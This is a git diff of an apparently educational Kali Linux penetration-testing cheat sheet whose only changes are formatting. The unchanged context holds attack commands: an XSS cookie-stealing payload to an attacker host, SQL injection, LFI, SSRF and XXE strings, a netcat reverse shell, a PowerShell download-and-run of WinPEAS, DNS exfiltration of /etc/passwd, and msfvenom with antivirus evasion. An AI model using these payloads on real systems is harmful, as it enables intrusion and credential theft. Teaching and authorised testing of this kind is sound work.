1- ---
1+ ---
22seoTitle : Kali Linux Complete Guide – Penetration Testing, Tools & Commands
33description : " Comprehensive Kali Linux reference covering installation, Linux fundamentals, shell commands, networking, user management, penetration testing tools, Metasploit, Nmap, Wireshark, Burp Suite, and ethical hacking workflows."
44keywords : " Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, Wireshark, Burp Suite, wireless security, security tools, cybersecurity, Linux commands, kali linux tutorial, kali linux guide, kali linux notes, VR-Rathod, Code-Note, code note vr, vr book"
@@ -18,7 +18,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
1818 - BackTrack had architectural limitations and was hard to maintain.
1919 - Goal: FHS-compliant, properly packaged, enterprise-grade free platform for security professionals.
2020 - Used by: pentesters, CTF players, security researchers, law enforcement, students.
21-
21+ -
2222- # Introduction
2323 collapsed:: true
2424 - ## What is Kali Linux?
@@ -37,7 +37,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
3737 Kali Linux Cloud → AWS, Azure, GCP images
3838 Kali Linux Undercover → Looks like Windows 10
3939 ```
40-
40+ -
4141- # Installation & Setup
4242 collapsed:: true
4343 - ## System Requirements
@@ -65,7 +65,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
6565 5. passwd root → enter new password
6666 6. exec /sbin/init
6767 ```
68-
68+ -
6969- # Kernel & Architecture
7070 collapsed:: true
7171 - ## What is the Kernel?
@@ -125,7 +125,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
125125 s Socket (IPC network communication)
126126 p Named pipe (FIFO) (IPC between processes)
127127 ```
128-
128+ -
129129- # Shell & Terminal
130130 collapsed:: true
131131 - ## Shell Types
@@ -169,7 +169,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
169169 - ```
170170 Format: -rwxrwxrwx (owner group others)
171171 r=4 w=2 x=1 → 7=rwx 6=rw- 5=r-x 4=r-- 0=---
172-
172+
173173 chmod 755 script.sh # owner:rwx group:r-x others:r-x
174174 chmod 644 file.txt # owner:rw- group:r-- others:r--
175175 chmod 600 id_rsa # owner:rw- only (SSH key)
@@ -240,21 +240,21 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
240240 name="Kali"
241241 echo "Hello, $name"
242242 read -p "Enter name: " username
243-
243+
244244 if [ $age -ge 18 ]; then echo "Adult"
245245 elif [ $age -ge 13 ]; then echo "Teen"
246246 else echo "Child"; fi
247-
247+
248248 for i in {1..5}; do echo $i; done
249-
249+
250250 while [ $count -lt 10 ]; do echo $count; ((count++)); done
251-
251+
252252 greet() { echo "Hello, $1"; }
253253 greet "World"
254-
254+
255255 command; if [ $? -eq 0 ]; then echo "OK"; else echo "Fail"; fi
256256 ```
257-
257+ -
258258- # Process Management
259259 collapsed:: true
260260 - ## Viewing & Controlling Processes
@@ -290,7 +290,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
290290 cat /proc/meminfo # detailed memory
291291 dmidecode # hardware info from BIOS
292292 ```
293-
293+ -
294294- # Systemd & Service Management
295295 collapsed:: true
296296 - ## systemctl
@@ -319,14 +319,14 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
319319 /var/log/dpkg.log → package install history
320320 /var/log/apache2/ → web server logs
321321 /var/log/fail2ban.log → blocked IPs
322-
322+
323323 grep "Failed password" /var/log/auth.log # failed SSH
324324 grep "Accepted" /var/log/auth.log # successful SSH
325325 last # login history
326326 lastb # failed login attempts
327327 lastlog # last login all users
328328 ```
329-
329+ -
330330- # User & Group Management
331331 collapsed:: true
332332 - ## User Commands
@@ -360,7 +360,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
360360 gpasswd -d user group # remove from group
361361 groups username # show user's groups
362362 ```
363-
363+ -
364364- # Package Management
365365 collapsed:: true
366366 - ## APT Commands
@@ -391,7 +391,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
391391 kali-tools-sniffing-spoofing sniffing
392392 kali-tools-social-engineering SET etc
393393 ```
394-
394+ -
395395- # Disk & Storage Management
396396 collapsed:: true
397397 - ## Disk Info & Partitioning
@@ -422,7 +422,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
422422 chmod 600 /swapfile && mkswap /swapfile && swapon /swapfile
423423 echo '/swapfile none swap sw 0 0' >> /etc/fstab
424424 ```
425-
425+ -
426426- # Networking
427427 collapsed:: true
428428 - ## Network Info
@@ -476,7 +476,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
476476 ufw enable / ufw status
477477 ufw allow 22 / ufw allow 80/tcp / ufw deny 23
478478 ```
479-
479+ -
480480- # Penetration Testing Methodology
481481 collapsed:: true
482482 - ## Phases
@@ -489,7 +489,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
489489 ```
490490 - ## Legal Rules
491491 - NEVER test without written permission. Get signed Rules of Engagement. Stay in scope. Practice on VulnHub, HackTheBox, TryHackMe.
492-
492+ -
493493- # Information Gathering
494494 collapsed:: true
495495 - ## Nmap
@@ -527,7 +527,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
527527 # Recon-ng: web reconnaissance framework
528528 recon-ng # launch recon-ng
529529 ```
530-
530+ -
531531- # Service Enumeration
532532 collapsed:: true
533533 - ## SMB / Samba
@@ -547,35 +547,35 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
547547 nmap -p 21 --script ftp-anon target
548548 ftp target # anonymous: user=anonymous pass=email
549549 hydra -l admin -P rockyou.txt ftp://target
550-
550+
551551 # SNMP (UDP 161)
552552 nmap -sU -p 161 --script snmp-info,snmp-brute target
553553 snmpwalk -c public -v2c target
554554 onesixtyone -c community-strings.txt target
555-
555+
556556 # LDAP (port 389)
557557 nmap -p 389 --script ldap-search target
558558 ldapsearch -x -H ldap://target -b "dc=domain,dc=com"
559-
559+
560560 # NFS (port 2049)
561561 showmount -e target # show NFS exports
562562 mount -t nfs target:/share /mnt/nfs
563-
563+
564564 # MySQL (3306) / MSSQL (1433)
565565 nmap -p 3306 --script mysql-info,mysql-enum target
566566 mysql -h target -u root -p
567567 nmap -p 1433 --script ms-sql-info target
568568 impacket-mssqlclient sa:password@target
569569 ```
570-
570+ -
571571- # Vulnerability Scanning
572572 collapsed:: true
573573 - ## Nikto & OpenVAS
574574 - ```bash
575575 nikto -h http://target.com # web server scan
576576 nikto -h http://target.com -ssl -p 8443 # HTTPS custom port
577577 nikto -h http://target.com -o report.html -Format html
578-
578+
579579 apt install gvm && gvm-setup && gvm-start # OpenVAS setup
580580 # Web UI: https://127.0.0.1:9392
581581 ```
@@ -587,7 +587,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
587587 searchsploit -m 12345 # copy to current dir
588588 searchsploit --update # update database
589589 ```
590-
590+ -
591591- # Exploitation Tools
592592 collapsed:: true
593593 - ## Metasploit Framework
@@ -602,7 +602,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
602602 set LPORT 4444
603603 set PAYLOAD windows/x64/meterpreter/reverse_tcp
604604 check / run
605-
605+
606606 # Meterpreter post-exploitation
607607 sysinfo / getuid / getsystem # info / user / privesc
608608 hashdump # dump password hashes
@@ -626,7 +626,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
626626 # Encoded (AV evasion)
627627 msfvenom -p windows/meterpreter/reverse_tcp LHOST=x LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o enc.exe
628628 ```
629-
629+ -
630630- # Password Attacks
631631 collapsed:: true
632632 - ## John the Ripper
@@ -660,7 +660,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
660660 crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
661661 cewl http://target.com -w wordlist.txt # scrape site for words
662662 ```
663-
663+ -
664664- # Web Application Testing
665665 collapsed:: true
666666 - ## Burp Suite
@@ -698,32 +698,32 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
698698 SQL Injection:
699699 ' '' ' OR 1=1-- admin'-- ' UNION SELECT NULL,NULL--
700700 Time-based: ' AND SLEEP(5)--
701-
701+
702702 XSS:
703703 <script>alert(1)</script>
704704 <img src=x onerror=alert(1)>
705705 <svg onload=alert(1)>
706706 Cookie steal: <script>document.location='http://attacker/?c='+document.cookie</script>
707-
707+
708708 LFI:
709709 ?page=../../../../etc/passwd
710710 ?page=php://filter/convert.base64-encode/resource=index.php
711711 Log poisoning: inject PHP in User-Agent → include log file
712-
712+
713713 Command Injection:
714714 ; id | id && id `id` $(id)
715715 Blind: ; sleep 5 ; ping -c5 attacker.com
716-
716+
717717 SSRF:
718718 url=http://127.0.0.1/
719719 url=http://169.254.169.254/latest/meta-data/ (AWS)
720-
720+
721721 XXE:
722722 <?xml version="1.0"?>
723723 <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
724724 <root>&xxe;</root>
725725 ```
726-
726+ -
727727- # Network Sniffing & Analysis
728728 collapsed:: true
729729 - ## Wireshark
@@ -758,7 +758,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
758758 # Victim nc: nc attacker 4444 -e /bin/bash
759759 # File transfer: nc -lvp 4444 > file | nc host 4444 < file
760760 ```
761-
761+ -
762762- # Wireless Security
763763 collapsed:: true
764764 - ## Aircrack-ng Suite
@@ -785,7 +785,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
785785 # Configure hostapd-wpe.conf with SSID matching target
786786 hostapd-wpe hostapd-wpe.conf
787787 ```
788-
788+ -
789789- # Privilege Escalation
790790 collapsed:: true
791791 - ## Linux PrivEsc
@@ -812,7 +812,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
812812 # Automated: WinPEAS
813813 IEX(New-Object Net.WebClient).downloadString('http://attacker/winPEAS.ps1')
814814 ```
815-
815+ -
816816- # Post-Exploitation & Persistence
817817 collapsed:: true
818818 - ## Linux Persistence
@@ -870,7 +870,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
870870 # DNS exfil: encode data in DNS queries
871871 cat /etc/passwd | xxd -p | while read l; do dig $l.attacker.com; done
872872 ```
873-
873+ -
874874- # Forensics & Steganography
875875 collapsed:: true
876876 - ## Disk Forensics
@@ -894,7 +894,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
894894 exiftool -all= image.jpg # strip all metadata
895895 zsteg image.png # detect hidden data in PNG
896896 ```
897-
897+ -
898898- # Reverse Engineering
899899 collapsed:: true
900900 - ## Static Analysis
@@ -936,7 +936,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
936936 VV # visual graph mode
937937 iz # strings in data section
938938 ```
939-
939+ -
940940- # Anonymity & Evasion
941941 collapsed:: true
942942 - ## Tor & Proxychains
@@ -974,7 +974,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
974974 apt install shellter && shellter
975975 # Check detection: https://antiscan.me (NOT VirusTotal for ops)
976976 ```
977-
977+ -
978978- # Cryptography Tools
979979 collapsed:: true
980980 - ## Hash Identification
@@ -1002,7 +1002,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
10021002 gpg --decrypt file.txt.gpg > file.txt
10031003 gpg --sign file.txt && gpg --verify file.txt.gpg
10041004 ```
1005-
1005+ -
10061006- # Social Engineering Tools
10071007 collapsed:: true
10081008 - ## SET — Social Engineering Toolkit
@@ -1022,7 +1022,7 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
10221022 # Workflow: Sending Profile → Email Template → Landing Page → User Group → Launch Campaign
10231023 # Tracks: opens, clicks, submitted credentials
10241024 ```
1025-
1025+ -
10261026- # More Learn
10271027 - ## Official Resources
10281028 - [Kali Linux Official Docs](https://www.kali.org/docs/)
@@ -1053,4 +1053,4 @@ keywords: "Kali Linux, penetration testing, ethical hacking, Metasploit, Nmap, W
10531053 - [Kali Linux Full Course – NetworkChuck 🐧](https://www.youtube.com/watch?v=lZAoFs75_cs)
10541054 - [Ethical Hacking Full Course – freeCodeCamp 🔐](https://www.youtube.com/watch?v=3Kq1MIfTWCE)
10551055 - [TryHackMe Walkthroughs – John Hammond 🎯](https://www.youtube.com/@JohnHammond)
1056- - [IppSec – HackTheBox Walkthroughs](https://www.youtube.com/@ippsec)
1056+ - [IppSec – HackTheBox Walkthroughs](https://www.youtube.com/@ippsec)
0 commit comments